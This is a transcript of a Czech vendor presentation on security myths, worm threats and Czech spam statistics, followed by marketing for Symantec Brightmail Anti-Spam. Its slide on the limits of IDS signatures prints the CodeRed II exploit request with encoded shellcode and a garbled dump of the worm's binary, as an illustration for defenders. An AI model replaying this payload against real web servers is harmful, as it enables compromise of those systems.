mýty a reality bezpečnosti
DESCRIPTION
Mýty a reality bezpečnosti. Jaroslav Techl [email protected] ABAKUS Distribution, a.s. Čeho jsme stále více svědky?. Téměř všechny větší společnosti se ocitají bez perimetru Částečně se jedná o důsledky diverzifikace obchodních aktivit - PowerPoint PPT PresentationTRANSCRIPT
Mýty a reality bezpečnostiMýty a reality bezpečnosti
Jaroslav TechlJaroslav Techl
[email protected]@abdist.cz
ABAKUS Distribution, a.s.ABAKUS Distribution, a.s.
2 –
• Téměř všechny větší společnosti se ocitají bez perimetru• Částečně se jedná o důsledky diverzifikace obchodních aktivit
• Masové užívání přenosných počítačů přináší zcela zásadní rizika
• Naprostá většina útoků je aplikačních a přichází povolenými porty
• Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů
• Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků
• Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům
• Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou
• Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí
• Kompromitace zevnitř jsou stále více záměrem vnějších útočníků
Čeho jsme stále více svědky?
3 –
Proč se to děje s takovým úspěchem?
Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní
obránci, podléhající řadě bezpečnostních mýtů.
4 –
1. mýtus – „Technologie rozhoduje“
• Rozhodují lidé!
• Zranitelný software tady bude a výrobce to nevyřeší.
• Útočníci tady také budou a budou kompetentní.
• Zvyšujte tedy svoji kompetenci rychleji.
• Základem je znát, ne domnívat se! Myslet, znamená nevědět.
• Naprosté většině úspěšných útoků předcházejí nezpozorovaná nebo ignorovaná varování
• Přes pokles tempa vzniku nových zranitelností zůstává stále frekvence na úrovni 73/týden (statistika CERT za rok 2003)
• Očekávat, že tuto záplavu zvládnou provozně orientovaní správci bez nástrojů je zcela iluzorní a nerealistické
• Většina útoků nevyžaduje žádnou nebo jen minimální interakci s uživatelem. Ten jim nezabrání. Proti profesionálovi musí stát profesionál.
5 –
Realita – inkubační doba zranitelností
0
50
100
150
200
250
300
350
Inkubace
MS IIS and PWS Extended Direcotry Traversal ISC Bind Transaction Signatures
SSH CRC Compensation Attack Detector MSIE MIME Header Attachment Excution
MS IIS printer ISAPI Extension MS IIS Indexing Server ISAPI Extension
Soaris lpd Remote Command Injection CDE dtspcd Buffer Overflow
V Login Buffer Overflow PHP Post File Upload Buffer Overflow
Open SSH Channel Code OffByOne MS Win Process Handle Local Privilege
MS SQL Server Resolution Service Stack Apache Chunk Encoding Memory Corruption
Open SSH Challenge Response Buffer Overflow Open SSL Malformed Cleint Key Remote
6 –
2. mýtus – „Vždyť jsou to jen viry!“
• Nejčastěji Vás ohrožují replikující se „kódy – hackeři“
• Napadení typicky přichází po vně povolených portech nebo zevnitř sítě
• Jsou atakovány zranitelnosti a standardně otevřené porty nechráněných služeb
• Vlastní smtp enginy v těle kódu vedou k anonymnímu vykrádání informací
• Souběh skanů a nelegálních smtp transakcí zapříčiňuje DDoS útok zevnitř
• Koncový uživatel je čistou obětí, nikoliv „spolupachatelem“ škod
• Drtivá většina těchto kódů v sobě obsahuje nebo umožňuje trojskou logiku
• Samotné antiviry (bez ohledu na výrobce) často nemohou útoku účinně zabránit
7 –
Realita – kombinované hrozby
8 –
Rozsah napadených platforem
• Compaq OpenVMS
• Compaq True64 Unix
• Cray UNICOS
• Entegrity DCE/DCF for Linux, True 64 Unix
• Entegrity PC-DCE for Windows
• HP Advanced Security for VP HP-UX, Solaris
• HP-UX 10.2-11.0
• HP OpenView Operations, VP Manager
• IBM DCE Windows, AIX, Solaris
• MS Windows 2000 Advanced Server, Data Center, Professional
• MS Windows XP Home, Professional
9 –
Blaster: Co to bylo?
Červ, který se chová jako naprogramovaný hacker• Spustitelný kód je tajně umístěn do počítače• Dorazí jako deformovaná zpráva přes port 135 (DCOM RPC)
Důvody jeho úspěšnosti• Využití známé zranitelnosti Microsoft RPC.
— Shodí službu a vloží deformovanou zprávu do systému
• Port 135 je v interních sítích typicky ponecháván otevřený, výsledkem je interní DDoS
• Port 135 je používán pro Win management, i v případě osobních firewallů bude často přístupný
• Infikovaný stroj se restartuje předtím, než může být zaveden patch• Vzniká plných 27 dní před vyrobením patche
10 –
3 .mýtus – „Jsme přece za firewallem“
• Jste si jisti slůvkem „za“?• Značná část vlastních uživatelů pracuje velmi frekventovaně mimo perimetr
— Mobilní pracovníci s notebooky, palmy apod.
— Absence osobních firewallů (zejména kvůli slabinám v administraci)
— Korporativní firewally stojí pouze na připojeních k Internetu
— Povolené porty a služby, které jsou vynuceny obchodními činnostmi
• Značnou část externích subjektů pouštíme velmi frekventovaně za perimetr
— Obchodní partneři, zákazníci, dodavatelé, veřejnost
— Servisní pracovníci, vývojáři, testovací práce, pilotní projekty
— Outsourcing a diverzifikace činností uvnitř korporací
• Proč tedy mnoho těchto útoků přes Váš firewall prošlo?
— Část jich propouštíte podle vlastních pravidel (až 80% útoků je aplikačních)
— IDS systémy nejsou nasazovány tak, aby prohloubily perimetr směrem dovnitř
— To, že se útoky za firewallem projevily, neznamená, že skrze něj přišly
11 –
Realita – nejčastěji skanované porty
27%
18%
13%
11%
7%
7%
7%
5%5%
Common Internet File System
NETBIOS Name Service
Microsoft SQL Monitor
HTTP
FTP
Microsoft SQL Server
NetBios RPC
HTTPS
17300
12 –
4. mýtus – „IDS – to je, co frčí!“
• Co je to síťové IDS založené na signaturách útoků?• Signaturové IDS je svým mechanismem de facto blízké „packetovému antiviru“
• Vysoká aktualizační zátěž (není signatura, není detekce)
• Existuje asi 3000 známých útoků vs. současné IDS jsou schopny uplatnit 600 signatur
• Nulová účinnost v nulových dnech vs. simulace účinnosti honbou za známými útoky
• Vysoký počet falešných hlášení a snadná možnost zneužití zvenčí
• Proč mají výrobci síťových IDS tak malou instalovanou bázi?• Každé reálně nasazené IDS zakládá problém typu „24x7x365“
• Minimální podpora agregací a korelací útoků vs. statisíce izolovaných událostí
• Vysoká pracnost odlišení falešných hlášení od skutečných síťových útoků
• Finální rozčarování pak vede k tomu, že mnohé systémy končí opět v krabici na skříni
• Detekce anomálií v protokolech a provozu, využívající signatur jen doplňkově
• Použití výkonných agregačních a korelačních enginů – incidenty
13 –
Realita – omezení signaturových systémůGET default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xmlContent-length: 3379 ネネ ` ・ ・フ dg 6 dg ・ 鞜 h 劫 \ P U 恪・ P U ・ @ ・燕 X U ・ 斑 = 版ヘ 燕カノ T 丘 ×0 ・ ・ ヌ F0 ・ ・ CodeRedII ・ $ U 、 Yj 劫 p P uU ーサ タ tK3 U ・ 3' u? ・ ・ ・ 畿ヌ ヌ ヌ � 怨 d 劫 h Pj 劫` Pj j U 屠 Th~fu U 、 Y ・ u1 X- モ j h ・ P uU ャ = ・ uj j 劫 \ P uU uU 鱸 エ サ ゚ w ・ ・ xu サ ` ・ 掬$dg ・ Xa ・ dg 6 dg ・ f ・ MZu 繼 K< ・ PE u 亀ラ x 毅モ ・ KERNu -ナ EL32u サ 3 ノ I 脚 A ・ュ GetPu|rocAu ・ JI ・ム J$ キ・チ J ・ 吋テ $$dg ・ Xa 鏖云・テ E LoadLibraryA u ・ UE CreateThread u ・ UE GetTickCount u ・ UE ・ Sleep u
・ UE 韋 GetSystemDefaultLangID u ・ UE 蒻 GetSystemDirectoryA u ・ UE 琲 CopyFileA u ・ UE ・ ワGlobalFindAtomA u ・ UE ・ リ GlobalAddAtomA u ・ UE ・ ヤ CloseHandle u ・ UE ・ ミ _lcreat u ・ UE ・ フ _lwrite u・ UE ・ ネ _lclose u ・ UE ・ ト GetSyste mTime u ・ UE ・ タ WS2_32.DLL UE ・ シ socket u シ UE ・ ク closesocket
u シ UE ・ エ ioctlsocket u シ UE 、・ connect u シ UE ・ ー select u シ UE ・ send u シ UE ・ ャ recv u シ UE ・ ィgethostname u シ UE 懆 gethostbyname u シ UE 倩 WSAGetLastError u シ U 碑 USER32.DLL UE 占 ExitWindowsEx u ・UE 古畿・タ ・ @ 右 ы ・ xV4 チタ 鞦テ < t ・ t 竟旗韆韓・鞋旗靱韓雍・チ ・ Y ・・リ # ・リ � ・ t 麾鍗 t ・拗 t 津 h 劫 \ P U 熏シ \ ・ \CMD.EXE ^ ・・、ウ cj ・ d:\inetpub\scripts\root.exe ・ $・劫 \ P U ワ j ・ d:\progra~1\common~1\system\MSADC\root.exe ・ $ ・劫 \ P U 霄ワ ・ ZP ク @ ・・・ PE L *%) 潤 @ @ 0 ・ ` @ タ 0 @ ・・・・・・・・・・・・・・・・・・・・・・ タ h h ミ @ 鐶 査 ミ @ セ @ ・・・・ jh ミ @ 鎰 ・ h タ‘ ・ ・ h リ $@ h? j h @ h ・ タ u&jhT @ jj hH @ 5 リ $@ ・ 5 リ $@ ・ h リ $@ h? j hX @ h 竟 タ uU ・ス @ 鎰 スィ @ 錚 j h ク @ jj h ー @ 5 リ $@ 雍 j h ト @ jj h エ @ 5 リ $@ 陌 5 リ $@ 陏 テヌ ミ $@ h ミ$@ h ミ @ h ヤ $@ j U 5 リ $@ 鐐 タ uI 。ミ $@ タ t@ セミ @ > t6Ff× ,,u217 ・ フ @ ・ミ $@ 5 ミ $@ h ミ @ jj U 5 リ $@ ・ テ %`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@ ・・・・・・・・・ \EXPLORER.EXE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable ・ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC /C /D c:\,,217 d:\,,217 ・・・・・・・・・・・・ <0 ・ `0 L0 ・ p0 ・ ヲ 0 セ 0 ネ 0 ワ 0 ・ 0 ・ ヲ 0 セ 0 ネ 0 ワ 0 ・ 0 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExARegCloseKey ・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ^ ソケ j ・ d:\explorer.exe ・ $ ・ U フ・ tM 怨 L 旗ャ 8>u'j ・ jV オ L U ネ FOu ナオ L U ト テ � 珒 ・・テ a ノツ
14 –
5. mýtus – „Více výrobců = více jistoty!“
• Ani kombinace technologií různých výrobců nemusí být všelékem• Kombinace různých produktů od různých výrobců má své kouzlo (například v případě
heuristické kontroly antivirů)
• Přináší však řadu úskalí – různá správa, rozdílná aktualizace, občasné konflikty na stejných systémech
• Mezníkem je často velikost společnosti – važte proti sobě výhodu různosti a problém neovladatelnosti
• Náklady na integraci často překračují náklady na produkty• Základním problémem integrace není to, „aby si produkty navzájem rozuměli“
• Jde o to, aby lidé rozuměli tomu, „co se ve všech těch produktech současně děje“
• Účinnost je založena na informaci, na jejímž základě se rozhodnu a správně konám
• Často neplatí, že kombinace „toho nejlepšího“ dává něco „ještě lepšího“
15 –
Realita – Jak pejsek s kočičkou vařili dort
16 –
6. mýtus – „Hacker je technický genius“
• Sociální techniky jsou stále velmi účinné a měli by být prověřovány
• Technické zranitelnosti svých systémů můžete relativně snadno zjišťovat, už jste někdy zavolali koncovému uživateli
• Základní školení bezpečnostních praktik by nemělo být dlouhodobě obcházeno (Enterprise Security Awareness Program)
• I nízká kvalifikace může stačit při velké důvěře nebo neomezené příležitosti
• Sociálně založený hacking přichází často i zevnitř (rozdílná motivace)
• James Bond na střeše nepřistane, stále je jednodušší dát někomu peníze
• Snažte se personálními opatřeními snížit fluktuaci klíčových pracovníků
• Fluktuace se typicky týká shodných nebo podobných oborů – Vaši lidé přijdou ke konkurenci
• Omezujte obtížně kontrolovatelné technologie (plošné přístupy přes ODBC, klíčová data ve sdílených adresářích...)
17 –
7. mýtus – „Všichni si rozumíme“
• Sociální techniky jsou stále velmi účinné a měli by být prověřovány
• V čem spočívá podstata lidské komunikace a v čem je její problém?
• Strana, která „kóduje“ používá jiný klíč, než strana, která „dekóduje“
— Různá úroveň znalostí a kvalifikace
— Různé zkušenosti a představy o sdíleném obsahu
• Mnoho scénářů úspěšných útoků počítá s tímto faktem !!!
• Než se lidé dohodnou, často již není na čem se dohadovat• Fingované útoky proti IDS odvádějící pozornost bezpečnostních specialistů
• Kombinované útoky různůmi červy ve stejném čase nebo v těsné souslednosti
• Různé projevy téhož na různých úrovních
— Jak to vidíme „my od firewallu“
— Helpdesk už má zase problémy s aplikací
— Správce něco udělal s přístupy...
18 –
Hlavní zásady účinné bezpečnosti
• Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci• I bezpečnostní specialisté často redukují bezpečnost na technologii
• Zásadně je podceňována hodnota přesných informací a včasných varování
• Naprostá většina společnostní používá pouze kombinaci firewall/antivirus
• Převážná většina firewallů nepracuje na aplikační vrstvě a není schopna rekonstruovat pakety na vnitřních rozhraních
• Základním problémem jsou lidé, jejich informovanost, komunikace, rozhodnutí a akce
• Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů
• Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků
• Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům
• Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou
• Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí
• Investujte do zhodnocení dat, která již máte a do schopnosti řídit odezvu
19 –
Realita v České republice včera
Antivirové záznamy celkem
Antivirové záznamy HTTP/FTP
Provoz na perimetru
Útoky podle typu ne jen AV
20 –
Stav spamu – v průměru 66% jsme naměřili v ČR
Průměrné stavy po měsících:• Listopad 2004 52%• Prosinec 2004 71%• Leden 2005 82%
Z toho bylo zamořeno červy:• Listopad 2004 7% z celkového objemu (tj. 3928 zpráv)• Prosinec 2004 3% z celkového objemu (tj. 1981 zpráv)• Leden 2005 1% z celkového objemu (tj. 8 zpráv)
(Výsledek za leden je zkreslen tím, že jsme testovali účinnost firewallů před antispamovou bránou.)
21 –
Údaje spamové sondy po měsících
0
10000
20000
30000
40000
50000
60000
70000
Listopad Prosinec Leden
Zpracovano Spam Viry a cervy
22 –
Podrobnější pohled po týdnech
0
5000
10000
15000
20000
25000
30000
31.10.04 14.11.04 28.11.04 12.12.04 26.12.04 9.1.05 23.1.05
Zpracovano Spam Viry a cervy
23 –
Virová zátěž ve spamu po měsících
0
10000
20000
30000
40000
50000
60000
70000
Listopad Prosinec Leden
Zpracovano Viry Cervy Neskanovatelne
24 –
Viry a červy ve spamu po týdnech
0
5000
10000
15000
20000
25000
30000
31.10.04 14.11.04 28.11.04 12.12.04 26.12.04 9.1.05 23.1.05
Zpracovano Viry Cevy Neskanovatelne
Architektura a nasazení řešeníSymantec
26 –
Základní pohled na architekturu
Na straně Symantec U zákazníka
Až 25% pošty v Internetu!
Aktualizace od 10 minut
27 –
Architektura Symantec Brightmail Anti-Spam 6.x u zákazníka
28 –
Analýza SPAMu: centra BLOC
29 –
Analýza SPAMu: zkušební síť
• Shromažďuje obrovská množství pošty pro spam analýzu
• Poskytuje varování přes spam útoky a jinými hrozbami v reálném čase
• Doručuje spam a falšovanou poštu do center BLOC, kde je analyzována a zpracována
• Agreguje statistiky o celkovém poštovním provozu, dovoluje měřit úrovně spamování
• Patentová ochrana: Symantec je držitelem unikátního patenru na spam honey-pot
• Globální pokrytí: Zahrnuje adresy od ISP a velkých korporací v Americe, regionu EMEA a APAC
• Mimořádný rozsah: Přes 2 miliony klamných mailových adres a domén. Spolu se vzorky spamové pošty od zákazníků kontrolujeme přes 300 milionů poštovních adres
• Zákazníci vytvářejí nové adresy, které směrují poštu do center Symantec/Brightmail
• Adresy jsou navrhovány tak, aby přitahovaly spammery a jsou široce publikovány
Základní funkce Proč je to unikátníJak to pracuje
Způsoby a metody filtrování
31 –
Obrana proti Spamu: víceúrovňový přístup
32 –
Fitrování dle identity a reputaci
• Identita: Určení domény, IP adresy nebo poštovní adresy odesílatele příchozí zprávy
• Reputace: Monitoring chování odesílatele a zdroje pošty s cílem určit poměr mezi legitimní poštou a spamem posílaným z daných adres
• Spolehlivost: Každý počítač v Internetu má unikátní IP adresu
• Obtížné oklamání: I když spammeři mohou snadno podvrhnout adresu odesílatele ([email protected]), nemohou snadno maskovat IP adresu odesílajícího stroje
• Problém otevřených relayí: Spammeři mohou používat otevřené relaye, které jsou vlastnictvím odesílatelů legitimní pošty
• Kvalita: Seznamy musí být extrémně přesné a často aktualizované, aby se mohly vypořádat se spammery
Co to je Výhody Výzvy
33 –
Co se děje na pozadí reputací?
34 –
Služba reputací: první linie obrany
Reputation Service
• Seznam otevřených proxy: zahrnuje stroje infikované nebezpečným kódem
• Seznam podezřelých: včetně strojů, jejichž pošta je vysoce spammová
• Seznam bezpečných: zahrnuje stroje, které neodesílaly spam
Dostupné seznamy
• Symantec trvale analyzuje reputaci IP adres, které odesílají poštu
• Symantec/Brightmail Scanner se rozhoduje buď v úplné nebo částečné závislosti na reputaci IP adresy odesílatele
• Služba plně integrována do Symantec /Brightmail Anti-Spam
Jak to pracuje
35 –
Filtrování podle reputace: výhoda pro zákazníka
• Patentovaná testovací síť proaktivně odhaluje otevřené proxy
• Ignoruje otevřené relaye, snižuje pravděpodobnost falešných detekcí
• Filtruje individuální servery, ne farmy
• Každou hodinu je vytvářen kompletně nový seznam
• Centra BLOC automaticky verifikují, zda jsou IP adresy otevřenými proxy
• Nové seznamy jsou každou hodinu automaticky znovu aktualizovány
• Nasazení je možné kdykoliv (restrikce nejsou omezeny pouze na poštovní gatewaye)
• Jediné řešení s aktualizovanými filtry na bázi reputace
• Nesrovnatelně vyšší přesnost a 2x vyšší výkonnost oproti standardním DNS lookup metodám
Přesnost Automatizace Flexibilita a rychlost
36 –
URL odkazy ve spamových zprávách
• Spammeři ve zvýšené míře užívají URL odkazy v poště
• 90% spamové pošty obsahuje URL odkaz, který může uživatel použít
Proč?
Spam URL Filtry
1. BLOC extrahuje v testovací síti URL od spamu
2. BLOC vytváří seznam URL od spammerů
3. URL odkazy jsou testovány, aby se zjistilo, zda je za nimi webový server spammerů
4. URL odkazy jsou stahovány do scannerů na straně zákazníka
5. E-mail se spam URL je blokován
Hrozba
Spammeři vydělávají velké peníze generováním webového provozu nebo
vybízením uživatelů k nákupům
Odezva
37 –
Spam URL Filtry: výhoda pro zákazníka
• Práce v reálném čase s dynamickými daty z testovací sítě – žádné „zatuchlé“ seznamy s filtry
• Přes 20.000 aktivních URL odkazů v seznamu
• Nové URL filtry jsou nasazovány každou hodinu
• Detekce falšovaných URL odkazů
• Rychlá kontrola shody u jednoduchých URL
• Pokročilá, heuristická analýza URL shody
• Zvláště efektivní proti URL odkazům typu „mailto:“
• Jen samotný spam URL filtr zachycuje přes 70% spamové pošty
• Vysoce účinné proti širokému rozsahu spamových zpráv
Trvalá aktualizace Flexibilita a rychlost Účinnost
38 –
Technologie antispamových signatur
• První generace technologie signatur
• MD5 hash na těle zprávy
• Zachycuje všechny identické zprávy, mající shodný MD5 hash
Hash na zprávě
• Patentované signatury pro zachycení “nejasných” shodností s tělem zprávy
• Identifikují mutace a náhodná generování používaná spammery k obejití filtrů
• Zachycují specifické útoky (a jejich variace) přímo ve fázi jejich rozvoje
BrightSig2
• Třetí generace technologie signatur
• Extrahuje přesné signatury MIME obsahu (např. pornografické obrázky, klamnou grafiku nebo i červy)
• Filtruje spam přílohy, současně povoluje průchod legitimním přílohám
Signatury příloh
39 –
Signatury příloh: poslední generace
40 –
Taktika spammerů: obejití filtrů falšováním HTML kódu
Jednoduchý způsob, kterým může spammer zařídit náhodné
generování obsahu zpráv
Zprávy s HTML mutacemi jsou velmi obtížně zachytitelné filtry
41 –
BrightSig2: Boj proti mutovaným spamům
Předem blokuje náhodně generované zprávy, které jsou mutacemi původního spam útoku
42 –
Heuristické filtrováníHledá víceré vlastnosti spamu
• Každá vlastnost „získává“určitý počet bodů
• Body se postupně sčítají• Je-li dosaženo SPAM skóre,
je zpráva blokována
Výhody• Dobré pro boj se zcela
novými spam záplavami
Nevýhody• Detekce může být delší• Spammeři zprávy často testují proti některým heuristickým enginům ještě
předtím, než záplavu spustí• Heuristiky musí být „trénovány“, aby zachytily spam (často za cenu zvýšení
počtu falešně blokovaných zpráv)
43 –
Heuristické filtrování: přednosti Symantecu
Z podstaty věci samé je většina heuristik konkurentů
kompromisem mezi účinností, přesností a výkonností
• Heuristika není naší primární antispamovou technologií, ale je pouze doplňkem
• Je použita až při neúčinnosti všech jiných filtrů
• Je proto navržena pro 5-10% celkové účinnosti systému
• Používá kompilovaný kód, který je 2-4x rychlejší než kód interpretovaný
Přesnost a rychlost
• Heuristika je automaticky trénována centry BLOC na straně Symantecu, a to s využitím testovací sítě a legitimní pošty
• Administrativní zátěž je dále snižována pomocí automatické aktualizace
Žádné „trénování“
44 –
• Jazykově agnostická – technologie filtrování
• Jazykově specifická – heuristika
• Zeměpisně založené – filtrování reputace
• Language ID pro velkou skupinu jazyků
• Filtrování jazyka “per user“
• Globální pokrytí BLOC
US
EMEA
APAC
• Jazykové schopnosti analytiků BLOC (plynně hovoří většinou světově používaných jazyků – dokonce i česky a slovensky)
Filtrování na bázi jazyka
Okolo 10% spamové pošty je v jiném než anglickém jazyku
Symantec umí zákazníka chránit před ne-anglickým spamem
Technologie filtrování Expertíza / zdroje
45 –
Příklad: Filtrování a identifikace jazyka „per-user“
46 –
Nebezpečný obsah: další velká hrozba
Antivirová detekce na bázi Symantec Scan Engine• Detekuje viry a červy ve zprávách a jejich přílohách• Červy jsou ze zpráv automaticky vymazávány• Antivirové definice jsou aktualizovány společně s antispamovými pravidly• K dispozici je oddělené i dodatečné licencování
47 –
Zákaznické filtry: silný doplněk
Umožňují správcům, aby filtrovaly jiné, než spamové zprávy• Vytvoření gobálních, na serverech založených filtrů pomocí editoru Custom
Filters• Víceré podmínky a skanovací kritéria:
— IP Addresy
— Odesílatel, příjemce, From, To, CC
— Pole záhlaví
— Tělo
— Velikost
— MIME záhlaví
Volitelné akce se zprávami
Minimální zátěž správců
49 –
Symantec/Brightmail Control Center
Webové rozhraní pro:• Centralizovanou správu
— Tlačná nastavení
— Získávání logů
• Webová karanténa— Rozhraní admina
— Rozhraní uživatele
• Monitoring— Summární přehled
— Stav „per- machine“
— Logy
— Statistiky a reporty
50 –
Globální správa a okamžitý celkový přehled
Centralizovaná správa vícenásobných serverů• Statistiky logů za jednotlivé nebo agregované skanery• Konsolidované reporty za všechny skanery
51 –
Jednoduché nastavení přes Control Center
Seznam blokovaných uživatelůSeznamu povolených adres Skórování účinnosti obsahových filtrů
Aktivace filtrování podle reputacíAktivace kontroly jazky
• Vložený Tomcat • Vložené MySQL• Vlastní software
– Webové stránky– SMTP Listener– Revize a vymazání– Upozornění
Kompletní řešení
Migrace nastavení předchozích verzí
Varování před událostmi
Konsolidované reportyKonsolidované pohledy na individuální logy
Skupinové politiky
Nastavení a přístup ke karanténě
Nastavení Brightmail skanerůIdentifikace externích mail serverů
Nastavení privilegií administrátorů
Antivirová kontrola
Vytvoření obsahových filtrů zákazníka
Změna LDAP nastavení
52 –
Skórování spamu
Každá spam zpráva ma skóre
Zprávy přes 90 dostávají verdikt
spam
Administrátor může měnit a ladit
skórování spamu
Administrátor může definovat
„spodní hranici“ skóre pro
podezřelé zprávy
Akce a nastavení jsou definována v
rámci skupinových politik
53 –
Vytvoř seznam „Top 10“:- nejspamovanější zaměstnanci- nejspamovanější domény- IP připojení spammerů a další...
Detailní Reporting
Za víceré kategorie zpráv• Jako jsou: zpracované, spamové, podezřelé, povolené, blokované,
virové atd.
Reporting podle vícerých kritérií• Příjemce• Odesílatel• Doména příjemce• Doména odesílatele• IP připojení atd.
Výhody• 19 předem připravených zpráv• Prohlížeč zpráv v Control Center• Ad hoc generování nebo
nastavené intervaly• Export do vícerých formátů
54 –
Skupinové politiky: k čemu jsou dobré?
55 –
Skupinové politiky: rozsah
• Všechny poštovní domény
• Sub domény
• Individuální uživatelé
• Podpora výběru typu „wildcart“
Různí členové skupin
• Spam
• Podezření na Spam
• Blokovaný odesílatel
• Povolený odesílatel
• Virus
• Červ
6 kategorií pošty
• Vymazání
• Označení těla zprávy
• Označení záhlaví zprávy
• Forward na poštovní adresu
• Uložení na disk
• Normální doručení
6 typů verdiktu
56 –
Komunikace• HTTPS mezi skanery a Control Center• HTTPS mezi správci, koncovými uživateli a Control Center (volitelné)
Privilegia administrátorů• Podpora vícerých typů privilegií• Různá privilegia pro různé administrátory
(někteří pouze přistupují ke karanténě,
jiní mohou měnit nastavení serverů...)
Autentikace koncového uživatele
přes LDAP do:• Active Directory• Exchange• SunOne
Control Center – bezpečnost správy
57 –
LDAP: schopnosti a výhody
Expanze poštovních aliasů• Karanténa dělá automatický resolving všech aliasů
a doručuje zprávy na karanténní účty tak, jak přísluší výchozím poštovním adresám
Karanténa může přistupovat k LDAP adresářům, jako jsou:
• Active Directory (Exchange 2000 a Exchange 2003)• Exchange 5.5• Sun ONE Directory Server
Přizpůsobitelné atributy LDAP:• Nastavení dotazů do LDAP je plně přizpůsobitelné.
Atributy dotazů lze kombinovat tak, aby byly ve shodě se schématem Vašeho LDAP adresáře.
58 –
Systémová varování
Okamžitá upozornění při výskytu
určitých provozních podmínek
Zasílá varovné maily správcům nebo
jiným pracovníkům
Aplikovatelné podmínky: • Některá z komponent neodpovídá nebo
nepracuje• Antispamové filtry jsou starší, než je
definovaný časový úsek pro aktualizaci• Antivirové definice jsou starší, než je
definovaný časový úsek pro aktualizaci• Karanténa má málo diskového prostoru
59 –
Rozšířené webové rozhraní karantény
• Spam je na vstupu centrálně ukládán a vůbec neprochází sítí
• Koncoví uživatelé jsou o spamu denně nebo týdně informováni
• Centralizované vymazávání spamu po uplynutí počtu X dnů
• Možnost “uvolnit” karanténované zprávy do inboxu uživatelů
• Uživatelé mají trvalý přístup ke karanténě
• Uživatelé i administrátoři mají k dispozici prohledávání
Výhody
60 –
Ukázka karantény
Na co si dát pozor u antispamu?
62 –
Ptejte se na: míru přesnosti!
Kritérium 1: Přesnost a správnost
Jenom zachytit spam samo o sobě nestačí• Zachycení spamu a přesnost antispamu – obojí musí být hodnoceno současně• Přesnost je často důležitější než účinnost (blokování legálních zpráv je
nejčastějším důvodem krachu antispamových projektů)• Mezi dodavateli jsou právě v oblasti přesnosti největší rozdíly !!!
Blokování legálních zpráv vytváří stejně velký problém jako spam• Uživatelé nejsou schopni dohledat poštu a bojují proti antispamu• Správci pošty, případně helpdesk řeší laviny eskalací• Dochází k obchodním ztrátám kvůli výpadku v doručování
63 –
Ptejte se na: měřitelnou účinnost !
Kritérum 2: Skutečná účinnost
Vícenásobné technologie zaručí kompletní ochranu před spamem• Žádná anti-spamová technologie není „kouzelným tlačítkem“• Různé filtry jsou efektivní proti různým typům spamu• Spammer musí překonat každý filtr víceúrovňového řešení
Inovace a globální pokrytí• Potřeba konstatní inovace je definována tím, že antispam musí být stále o krok
před spammery• Schopnost účinně filtrovat ne-anglické jezyky, včetně nativní podpory českého
jazyka
64 –
Ptejte se na: Minimální administraci !
Kritérium 3: Administrativní zátěž
Správce pošty a antispamu už nejsou “paní na hlídán픕 Automatické aktualizace filtrů• Není nutné žádné ladění a „učení“ heuristiky• Nainstaluj a běž – dělat něco jiného• Symantec vytváří filtry v režimu 24x7x365• Automatické řešení falešných blokací
Vysoké nároky na správu představují největší část „neviditelných“
nákladů na antispamová řešení
65 –
Proto jsme tady !!!